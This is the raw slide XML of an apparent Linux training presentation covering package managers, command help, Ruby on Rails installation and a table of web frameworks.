              <a:ext cx="11097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Linus </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" sz="1100"/>
                <a:t>Torvald</a:t>
              </a:r>
              <a:endParaRPr sz="1100"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="157" name="Google Shape;157;p33"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId7">
              <a:alphaModFix/>
            </a:blip>
            <a:srcRect b="15768" l="0" r="0" t="0"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="5031400" y="129548"/>
              <a:ext cx="539025" cy="665225"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="158" name="Google Shape;158;p33"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3865600" y="152375"/>
              <a:ext cx="11658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Ken Thompson</a:t>
              </a:r>
              <a:endParaRPr sz="1100"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="159" name="Google Shape;159;p33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5208350" y="4242675"/>
            <a:ext cx="601800" cy="601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0" name="Google Shape;160;p33"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="159" idx="7"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5722018" y="3029707"/>
            <a:ext cx="635400" cy="1301100"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="161" name="Google Shape;161;p33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5139950" y="4402275"/>
            <a:ext cx="7386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Amazon Linux</a:t>
            </a:r>
            <a:endParaRPr sz="6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14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="703037"/>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Ruby / ROR</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3020">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="633" name="Google Shape;633;p114"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="705300" y="1632300"/>
            <a:ext cx="7733400" cy="246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accent3"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>ruby -v</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="accent3"/>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chemeClr val="accent3"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>ruby –-version</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="accent3"/>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chemeClr val="accent3"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>gem –-version</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="accent3"/>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600">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>gem update --system 3.4.20</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>gem install rails</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>rails new &lt;projName&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>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15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="226325" y="220925"/>
            <a:ext cx="8520600" cy="572700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>General usage of Package Managers</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3720">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="639" name="Google Shape;639;p115"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="408725" y="793625"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{5F29EBE2-DF6B-4956-BA54-5617D0952659}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2119275"/>
                <a:gridCol w="2119275"/>
                <a:gridCol w="2119275"/>
                <a:gridCol w="2119275"/>
              </a:tblGrid>
              <a:tr h="383125">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en">
                          <a:solidFill>
                            <a:srgbClr val="274E13"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Version</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:solidFill>
                          <a:srgbClr val="274E13"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr">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74E13"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Package Manager</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:solidFill>
                          <a:srgbClr val="274E13"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr">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74E13"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Full Form</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:solidFill>
                          <a:srgbClr val="274E13"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr">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274E13"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Usage</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:solidFill>
                          <a:srgbClr val="274E13"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr">
                    <a:lnB cap="flat" cmpd="sng" w="9525">
                      <a:solidFill>
                        <a:schemeClr val="dk2"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="sm" w="sm" type="none"/>
                      <a:tailEnd len="sm" w="sm" type="none"/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="368925">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1300">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Ubuntu</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APT / </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1300">
                          <a:solidFill>
                            <a:srgbClr val="202124"/>
                          </a:solidFill>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                        </a:rPr>
                        <a:t>Snap</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Advanced Package Tool</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67575">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1300">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Amazon Linux 2023, CentOs </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YUM</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Yellowdog Updater, Modified</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yum - -help</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68925">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1300">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>ALPINE</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APK</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Alpine Package Keeper</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68925">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1300">
                          <a:solidFill>
                            <a:srgbClr val="1B2733"/>
                          </a:solidFill>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                        </a:rPr>
                        <a:t>Gentoo</a:t>
                      </a:r>
                      <a:endParaRPr sz="15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t>emerge</a:t>
                      </a:r>
                      <a:endParaRPr sz="1300"/>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rgbClr val="1B2733"/>
                          </a:solidFill>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                        </a:rPr>
                        <a:t>Portage</a:t>
                      </a:r>
                      <a:endParaRPr sz="15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300">
                        <a:solidFill>
                          <a:srgbClr val="1B2733"/>
                        </a:solidFill>
                        <a:highlight>
                          <a:srgbClr val="FFFFFF"/>
                        </a:highlight>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67575">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1300">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>RedHat</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RPM</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Red Hat Package Manager</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368925">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1300">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Debian/Ubuntu</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dpkg</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Debian package</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67575">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1300">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Amazon Linux, Fedora 22, CentOS8, and RHEL</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DNF</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Dandified Packaging Tool</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597375">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1300">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>OpenSUSE and SUSE Linux Enterprise</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300">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>ZYpp</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1100"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="1100"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1300">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>ZYpper package manager</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lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="1100"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="1100"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1300">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>zypper </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1300">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>--help</a:t>
                      </a:r>
                      <a:endParaRPr sz="1300">
                        <a:solidFill>
                          <a:schemeClr val="dk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16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="217225" y="430675"/>
            <a:ext cx="8520600" cy="1057800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3500">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>How to get additional information </a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="3500">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="3500">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>about a linux command?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4820">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="645" name="Google Shape;645;p116"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="894750" y="1962750"/>
            <a:ext cx="7286700" cy="2589900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-463550" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPts val="3700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3700">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>man &lt;LinuxCommand&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="3700">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-463550" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPts val="3700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3700">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;LinuxCommand&gt; --help</a:t>
            </a:r>
            <a:endParaRPr sz="3700">
              <a:solidFill>
                <a:srgbClr val="38761D"/>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17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="372075" y="1224125"/>
            <a:ext cx="8520600" cy="1057800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3500">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Package Manager Install</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4820">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="651" name="Google Shape;651;p117"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="372075" y="2190725"/>
            <a:ext cx="8520600" cy="14592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en" sz="2500">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo &lt;pmName&gt; &lt;pkg1&gt; &lt;pkg2&gt; &lt;pkg3&gt; …………….. -y</a:t>
            </a:r>
            <a:endParaRPr sz="2500">
              <a:solidFill>
                <a:srgbClr val="38761D"/>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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="302525" y="6781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020">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Programing Language  Web Frameworks</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3020">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="657" name="Google Shape;657;p118"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="302525" y="1322000"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{5F29EBE2-DF6B-4956-BA54-5617D0952659}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="4180300"/>
                <a:gridCol w="4180300"/>
              </a:tblGrid>
              <a:tr h="672200">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1500">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Language</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1500">
                        <a:solidFill>
                          <a:srgbClr val="6AA84F"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr">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6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Web Frameworks</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1500">
                        <a:solidFill>
                          <a:srgbClr val="6AA84F"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr">
                    <a:lnB cap="flat" cmpd="sng" w="9525">
                      <a:solidFill>
                        <a:schemeClr val="dk2"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="sm" w="sm" type="none"/>
                      <a:tailEnd len="sm" w="sm" type="none"/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="647275">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" u="sng">
                          <a:solidFill>
                            <a:schemeClr val="hlink"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId3"/>
                        </a:rPr>
                        <a:t>NodeJs</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u="sng">
                          <a:solidFill>
                            <a:schemeClr val="hlink"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>NextJs</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47275">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" u="sng">
                          <a:solidFill>
                            <a:schemeClr val="hlink"/>
                          </a:solidFill>
